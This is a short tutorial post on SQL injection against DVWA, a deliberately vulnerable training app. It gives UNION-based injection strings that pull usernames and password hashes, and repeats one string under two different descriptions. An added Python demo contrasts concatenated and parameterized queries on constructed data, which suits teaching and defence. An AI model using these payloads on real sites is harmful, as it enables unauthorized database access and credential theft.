How to do a SQL injection attack against Damn Vulnerable Web App.

Damn Vulnerable Web App (DVWA) is a deliberately vulnerable PHP web application. It is used to learn how websites are attacked by exploiting various vulnerabilities in the software. In this example, I am showing you how to use a SQL injection to get information out of the database.

Damn Vulnerable Web App SQL injection.

This line of code will extract all passwords from the DVWA database.

1' and 1=1 union select user, password from users#

And this simple line will get information about the admin user.

1' and 1=1 #

This will list all users on the system.

1' and 1=1 union select user, password from users#

These strings are a good start if you are messing around with DVWA and need help getting started with SQL injection. Setting DVWA to a low security setting seems to be necessary to allow these attacks to work. But these strings do work very well indeed.
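Why these strings work, and why a bound parameter stops them, shown as an added example that is not part of the original post and is not DVWA's own code. The table layout, the query shape and the sample rows are assumptions constructed for the demo, and SQLite stands in for MySQL.

```python
import sqlite3

# Constructed sample data. The table layout and the query shape are
# assumptions for this demo, not DVWA's actual source.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT,"
               " last_name TEXT, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "admin", "admin", "hash-admin-constructed"),
        (2, "Gordon", "Brown", "gordonb", "hash-gordonb-constructed"),
    ])
    return db

def mysql_hash_comment(sql):
    # MySQL treats '#' as a comment running to end of line; SQLite does not,
    # so cut the text there to reproduce what a MySQL server would parse.
    return sql.split("#", 1)[0]

def lookup_vulnerable(db, user_id):
    # The input is pasted into the SQL text. A quote inside it closes the
    # string literal, and everything after the quote is parsed as SQL.
    sql = ("SELECT first_name, last_name FROM users "
           "WHERE user_id = '%s'" % user_id)
    return db.execute(mysql_hash_comment(sql)).fetchall()

def lookup_parameterized(db, user_id):
    # The input is bound as a single value. The statement text is fixed,
    # so quotes, UNION and '#' inside the value are only data.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

# The input strings from the post above.
PAGE_STRINGS = [
    "1' and 1=1 #",
    "1' and 1=1 union select user, password from users#",
]

if __name__ == "__main__":
    db = make_db()
    for s in ["1"] + PAGE_STRINGS:
        print("input:        ", repr(s))
        print("concatenated: ", lookup_vulnerable(db, s))
        print("parameterized:", lookup_parameterized(db, s))
```

With the concatenated query the second string returns rows from the `user` and `password` columns in place of names; with the bound parameter both strings match no `user_id` and return nothing.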
